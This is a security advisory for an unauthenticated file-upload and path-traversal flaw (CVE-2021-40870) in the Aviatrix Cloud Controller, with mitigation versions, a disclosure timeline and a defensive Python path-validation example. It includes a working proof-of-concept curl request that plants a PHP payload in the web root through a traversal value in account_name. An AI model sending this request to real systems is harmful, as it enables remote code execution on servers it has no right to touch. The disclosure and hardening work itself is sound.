Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code
Overview
While the Aviatrix UI requires authentication, many API calls do not enforce a check for authentication. Some of these API calls allow an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.
Proof of concept
- Make the following request to the Aviatrix Cloud Controller aviatrix:
  curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'
- Visit https://aviatrix.domain.tld/v1/test. This will show the PHP Version page.
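The following added example (not Aviatrix code, and not part of the original advisory) shows why the account_name value in the request above resolves into the web root when a handler pastes it into a file path, and a server-side check that rejects it. The storage directory, function names, name allowlist and .json suffix are assumptions made for illustration.

```python
import os
import re

BASE_DIR = "/srv/app/metrics"  # hypothetical storage directory (assumption)
ACCOUNT_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")  # assumed naming policy
# account_name value taken from the proof-of-concept request above
POC_ACCOUNT_NAME = "/../../../var/www/php/test.php"


def naive_path(account_name, base_dir=BASE_DIR):
    """Vulnerable pattern: the request parameter is pasted into a file path."""
    return os.path.normpath(base_dir + "/" + account_name)


def safe_path(account_name, base_dir=BASE_DIR):
    """Hardened pattern: allowlist the name, fix the extension, verify containment."""
    if not ACCOUNT_NAME_RE.fullmatch(account_name):
        raise ValueError("account_name is not a plain identifier")
    root = os.path.realpath(base_dir)
    # The server picks a non-executable suffix; the caller never controls it.
    candidate = os.path.realpath(os.path.join(root, account_name + ".json"))
    # Defence in depth: also catches symlinks that point out of the directory.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("resolved path escapes the storage directory")
    return candidate


def is_rejected(account_name):
    """True when safe_path refuses the supplied name."""
    try:
        safe_path(account_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("naive :", naive_path(POC_ACCOUNT_NAME))
    print("PoC rejected by safe_path:", is_rejected(POC_ACCOUNT_NAME))
    print("safe  :", safe_path("prod-account"))
```

Path validation of this kind addresses only the file-write half of the issue; the API call must also enforce the authentication check described in the overview.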
Mitigation/further actions
Upgrade to one of the following versions:
- UserConnect-6.2-1804.2043 or later
- UserConnect-6.3-1804.2490 or later
- UserConnect-6.4-1804.2838 or later
- UserConnect-6.5-1804.1922 or later
Advisory timeline
- 2021-05-12: Discovered
- 2021-08-24: Reported to Aviatrix security team
- 2021-08-26: Aviatrix security team confirm vulnerability will be fixed in forthcoming release
- 2021-09-11: Fix released
- 2021-09-12: CVE requested
- 2021-09-13: CVE allocated
https://github.com/0xAgun/CVE-2021-40870
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40870.yaml
Originally published on the WeChat official account 无级安全: CVE-2021-40870|POC